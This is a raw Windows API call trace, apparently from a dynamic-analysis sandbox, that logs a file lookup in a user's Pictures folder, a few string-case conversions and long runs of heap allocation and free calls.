lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\6EeiE520t8A11Pm.jpg", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e5d5b00, ftCreationTime.dwHighDateTime=0x1d5e47f, ftLastAccessTime.dwLowDateTime=0xa9a111f0, ftLastAccessTime.dwHighDateTime=0x1d5ed11, ftLastWriteTime.dwLowDateTime=0xa9a111f0, ftLastWriteTime.dwHighDateTime=0x1d5ed11, nFileSizeHigh=0x0, nFileSizeLow=0x14b8d, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="6EeiE520t8A11Pm.jpg", cAlternateFileName="6EEIE5~1.JPG")) returned 0x41ac000 [0092.227] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0092.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0092.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0092.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0092.228] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0092.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0092.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0092.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f68 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0092.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0092.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0092.229] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0092.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0092.229] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0092.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0092.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2330 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0092.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0092.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0092.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0092.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca100 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0092.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0092.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0092.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0092.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0092.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0092.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0092.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0092.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0092.232] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0092.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0092.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0092.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0092.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0092.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0092.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0092.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0092.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0092.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0092.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0092.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0092.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0092.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0092.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.235] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0092.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0092.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0092.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0092.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0092.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0092.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0092.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0092.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0092.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0092.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0092.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0092.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0092.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0092.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0092.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0092.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0092.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0092.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0092.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0092.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 